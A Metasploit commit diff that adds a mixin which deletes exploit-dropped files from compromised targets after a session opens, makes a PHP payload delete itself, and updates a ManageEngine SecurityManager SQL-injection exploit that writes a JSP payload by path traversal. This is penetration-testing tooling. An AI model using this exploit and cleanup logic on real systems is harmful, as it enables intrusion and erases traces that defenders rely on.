Merge branch 'jlee-r7-feature/automatic-fs-cleanup'

Author: sinn3r

lib/msf/core/exploit/file_dropper.rb

@@ -0,0 +1,87 @@
+# -*- coding: binary -*-
+
+module Msf
+module Exploit::FileDropper
+
+	#
+	# When a new session is created, attempt to delete any files that the
+	# exploit created.
+	#
+	# @param (see Msf::Exploit#on_new_session)
+	# @return [void]
+	#
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			win_file = file.gsub("/", "\\\\")
+			if session.type == "meterpreter"
+				begin
+					# Meterpreter should do this automatically as part of
+					# fs.file.rm().  Until that has been implemented, remove the
+					# read-only flag with a command.
+					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
+					session.fs.file.rm(file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					false
+				end
+			else
+				cmds = [
+						%Q|attrib.exe -r "#{win_file}"|,
+						%Q|del.exe /f /q "#{win_file}"|,
+						%Q|rm -f "#{file}" >/dev/null|,
+					]
+
+				# We need to be platform-independent here. Since we can't be
+				# certain that {#target} is accurate because exploits with
+				# automatic targets frequently change it, we just go ahead and
+				# run both a windows and a unixy command in the same line. One
+				# of them will definitely fail and the other will probably
+				# succeed. Doing it this way saves us an extra round-trip.
+				session.shell_command_token(cmds.join(" ; "))
+				print_good("Deleted #{file}")
+				true
+			end
+		end
+
+		super
+	end
+
+	#
+	# Record file as needing to be cleaned up
+	#
+	# @param [Array<String>] files List of paths on the target that should
+	#   be deleted during cleanup. Each filename should be either a full
+	#   path or relative to the current working directory of the session
+	#   (not necessarily the same as the cwd of the server we're
+	#   exploiting).
+	# @return [void]
+	def register_files_for_cleanup(*files)
+		@dropped_files ||= []
+		@dropped_files += files
+
+		nil
+	end
+
+	# Singular version
+	alias register_file_for_cleanup register_files_for_cleanup
+
+	#
+	# Warn the user if any files (registered with {#register_dropped_file}) were
+	# not cleaned up
+	#
+	# @see Msf::Exploit#cleanup
+	def cleanup
+		super
+		if @dropped_files and @dropped_files.any?
+			@dropped_files.each do |f|
+				print_warning("This exploit may require manual cleanup of: #{f}")
+			end
+		end
+	end
+end
+end

lib/msf/core/exploit/php_exe.rb

@@ -50,7 +50,7 @@ def get_write_exec_payload(opts={})
 			end
 			if target["Platform"] == 'win'
 				bin_name << ".exe"
-				print_debug("Unable to clean up #{bin_name}, delete it manually")
+				print_warning("Unable to clean up #{bin_name}, delete it manually")
 			end
 			p = Rex::Text.encode_base64(generate_payload_exe)
 			php = %Q{
@@ -74,7 +74,9 @@ def get_write_exec_payload(opts={})
 		end
 
 		if opts[:unlink_self]
-			php << "unlink(__FILE__);"
+			# Prepend instead of appending to make sure it happens no matter
+			# what the payload normally does.
+			php = "@unlink(__FILE__);" + php
 		end
 
 		php.gsub!(/#.*$/, '')

modules/exploits/multi/http/manageengine_search_sqli.rb

@@ -6,11 +6,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/file_dropper'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
 	include Msf::Exploit::EXE
 
 	def initialize(info={})
@@ -68,9 +70,10 @@ def pick_target
 
 		rnd_num   = Rex::Text.rand_text_numeric(1)
 		rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
-		outpath   = "../../webapps/SecurityManager/#{rnd_fname}"
+		clean_path= "../webapps/SecurityManager/#{rnd_fname}"
+		outpath   = "../" + clean_path
 
-		@clean_ups << outpath
+		register_file_for_cleanup(clean_path)
 
 		sqli  = "#{rnd_num})) union select @@version,"
 		sqli << (2..28).map {|e| e} * ","
@@ -94,41 +97,6 @@ def pick_target
 		return nil
 	end
 
-
-	#
-	# We're in SecurityManager/bin at this point
-	#
-	def on_new_session(cli)
-		if target['Platform'] == 'linux'
-			print_warning("Malicious executable is removed during payload execution")
-		end
-
-		if cli.type == 'meterpreter'
-			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
-		end
-
-		@clean_ups.each { |f|
-			base = File.basename(f)
-			f = "../webapps/SecurityManager/#{base}"
-			print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")
-
-			begin
-				if cli.type == 'meterpreter'
-					cli.fs.file.rm(f)
-				else
-					del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del'
-					f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win'
-					cli.shell_command_token("#{del_cmd} \"#{f}\"")
-				end
-
-				print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
-			rescue ::Exception => e
-				print_error("Unable to delete: #{e.message}")
-			end
-		}
-	end
-
-
 	#
 	# Embeds our executable in JSP
 	#
@@ -229,6 +197,7 @@ def sqli_exec(sqli_string)
 				'COUNT'       => '1'
 			}
 		})
+
 	end
 
 	#
@@ -253,20 +222,23 @@ def inject_exec(out)
 
 
 	def exploit
-		# This is used to collect files we want to delete later
-		@clean_ups = []
-
 		@my_target = pick_target
 		if @my_target.nil?
 			print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
 			return
 		end
 
 		jsp_name  = rand_text_alpha(rand(6)+3)
-		outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+		# The working directory when our payload runs is
+		# c:/AdventNet/SecurityManager/bin/
+		# while the jsp file will be in
+		# c:/AdventNet/SecurityManager/webapps/SecurityManager/
+		# so we need to adjust the traversal level.
+		clean_path= "../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+		outpath   = "../" + clean_path
 
-		@clean_ups << outpath
+		register_file_for_cleanup(clean_path)
 
 		inject_exec(outpath)
 	end
-end
+end